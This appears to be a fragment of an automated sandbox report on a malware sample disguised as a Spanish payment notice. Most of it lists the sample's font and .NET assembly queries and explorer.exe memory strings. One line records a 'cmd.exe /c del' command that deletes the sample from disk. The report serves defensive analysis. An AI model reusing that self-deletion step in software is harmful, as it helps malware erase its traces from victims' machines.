          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeProcess created: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
          Source: explorer.exe, 0000000B.00000000.429405183.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.340340863.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.312051884.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 0000000B.00000000.349900984.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.434835236.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.312120732.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.357378647.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.429478272.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 0000000B.00000000.430191145.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.357720724.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.341085713.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
